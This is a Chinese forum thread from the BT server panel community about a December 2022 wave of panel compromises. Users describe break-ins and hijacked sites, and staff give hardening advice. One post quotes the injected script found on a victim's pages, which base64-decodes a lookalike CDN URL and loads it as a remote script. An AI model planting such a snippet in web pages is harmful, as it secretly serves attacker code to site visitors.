【官方公告】关于外传宝塔面板或Nginx异常的公告

Zxwax · 发表于 2022-12-13 18:58:02

本帖最后由 Zxwax 于 2022-12-13 19:04 编辑

tttttttttt 发表于 2022-12-13 16:52
为什么我的输入没有提示木马文件，说白了还是你们自己服务器端口号默认的不改，我服务器里面挂了安全狗，天 ...

小学生就不要参与这种讨论了。。。
https://www.bt.cn/bbs/thread-105281-1-1.html

宝塔用户_vtykot · 发表于 2022-12-13 19:27:12

Zxwax 发表于 2022-12-13 18:58
小学生就不要参与这种讨论了。。。
https://www.bt.cn/bbs/thread-105281-1-1.html

哈哈。个人感觉应该是绕过了鉴权。小学生以为装了360就天下无敌，和他们没必要较真。

Zxwax · 发表于 2022-12-13 21:04:36

宝塔用户_vtykot 发表于 2022-12-13 19:27
哈哈。个人感觉应该是绕过了鉴权。小学生以为装了360就天下无敌，和他们没必要较真。 ...

关键是后台端口和密码设置的都非常复杂，说实话我自己都记不住。。。入侵者却轻而易举的登录进去。。。

小新 · 发表于 2022-12-14 10:24:21

Zxwax 发表于 2022-12-13 21:04
关键是后台端口和密码设置的都非常复杂，说实话我自己都记不住。。。入侵者却轻而易举的登录进去。。。 ...

你好，我看了你发的帖子，是有修改了BT面板的默认端口，不知有没有开启BasicAuth认证？想了解一下修改默认端口再加上开启BasicAuth认证，不知能不能拦截这次的问题。

Zxwax · 发表于 2022-12-14 12:56:30

小新发表于 2022-12-14 10:24
你好，我看了你发的帖子，是有修改了BT面板的默认端口，不知有没有开启BasicAuth认证？想了解一下修改默认 ...

理论上知道账户密码和后台端口也无法登录的验证方式是可以避过本次事故的。。

堡塔开发wzz · 发表于 2022-12-14 16:08:37

小新发表于 2022-12-14 10:24
你好，我看了你发的帖子，是有修改了BT面板的默认端口，不知有没有开启BasicAuth认证？想了解一下修改默认 ...

更新宝塔面板到7.9.6，然后修复宝塔面板，修改宝塔面板的账号密码和安全入口，然后BasicAuth认证和ip限制登录、面板https、域名绑定等都可以开一下

系统加固、动态口令认证、https和域名绑定建议一定要弄，另外ip限制有条件也弄

宝塔用户_kfdouc · 发表于 2022-12-14 18:53:56

我遇到点启动可以，重启也可以，重载也可以，状态一直都是关闭

redstone · 发表于 2022-12-15 00:35:11

相信宝塔yyds！

kissfour · 发表于 2022-12-15 07:41:13

堡塔安全赤井秀一发表于 2022-12-14 16:08
更新宝塔面板到7.9.6，然后修复宝塔面板，修改宝塔面板的账号密码和安全入口，然后BasicAuth认证和ip限制 ...

个人建议，不知道正确与否。
域名绑定最重要，https反而不太重要，甚至有可能拉后腿。
我的设置如下：绑定一个未解析的域名，如：123.qq.com，也可以是456.163.com
总之绑定的不是本人名下的域名，当然也没法解析，没法设置https。只是本地host指向。
但胜在安全，如果开启https，就需要用自己的域名，需要解析，别人是有办法知道某个域名解析了哪些子域名的。所以开启https反倒有了隐患。
不知道我理解是否正确。

堡塔开发wzz · 发表于 2022-12-15 09:32:49

kissfour 发表于 2022-12-15 07:41
个人建议，不知道正确与否。
域名绑定最重要，https反而不太重要，甚至有可能拉后腿。
我的设置如下：绑 ...

https是加密传输的，相对http是更安全；https可以用ip或随便一个域名都可以实现自签证书签发，非常方便，不绑定域名也可以直接用面板https自签ip证书就可以了；
https建议一定要开，域名反而绑不绑随你个人

自签证书如何信任看这个
https://www.bt.cn/bbs/thread-105443-1-1.html

宝塔用户_xoslde · 发表于 2022-12-15 11:03:51

堡塔安全赤井秀一发表于 2022-12-15 09:32
https是加密传输的，相对http是更安全；https可以用ip或随便一个域名都可以实现自签证书签发，非常方便， ...

面板API配置包含什么？今天宝塔没配置什么，今天10-11:00发生两次告警：面板API配置发生改变，请及时确认是否本人操作。

堡塔开发wzz · 发表于 2022-12-15 11:49:58

宝塔用户_xoslde 发表于 2022-12-15 11:03
面板API配置包含什么？今天宝塔没配置什么，今天10-11:00发生两次告警：面板API配置发生改变，请及时确认 ...

加我微信，发宝塔面板给我检查一下

ba159 · 发表于 2022-12-15 13:22:55

宝塔上所有网站都被挂了相同的木马跳转（服务器上很多不同的cms系统）

选择很重要 · 发表于 2022-12-15 13:39:34

按照官方的指导，自己手动清理了两个木马，但是访问html文件还是有被挂马的代码，感觉没有清除干净。代码如下：

<script>(function() {var hm = document.createElement("script");hm.src = atob("aHR0cHM6Ly9jZG4uYm9vdHNjZG4ub3JnL2FqYXgvbGlicy9qcXVlcnkvMy42LjEvanF1ZXJ5Lmpz");var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();</script>

有没有人有相同的经历？

myboss · 发表于 2022-12-15 17:35:18

老衲依旧爱飘柔发表于 2022-12-9 14:11
(端口、ssh端口、宝塔端口）指定ip
启用防串改，权限644。
再牛掰都进不来

cms有漏洞，就能入侵了

【菠萝云】免费装宝塔,4G内存68	★美国CN2高防服务器★打死退款★	★香港CN2云/站群/高防/特价机★	【滴盾】高防服务器专抗DDOS	【多途云】高防CDN
高防服务器，无视一切流量攻击	SSL证书，防止数据被劫持	OV/EV SSL证书，可当日签发	宝塔一键部署DV,EV,OV,SSL证书	A10招租，联系qq394030111
★易探云.香港/美国/国内/游戏云★	【苍穹云】高性能云服务器 1.2折起	【迅线云盒】内网穿透-固定公网IP	高防服务器40核 64G 20M 199/月	【恒爱云】香港低至8元1核1G2M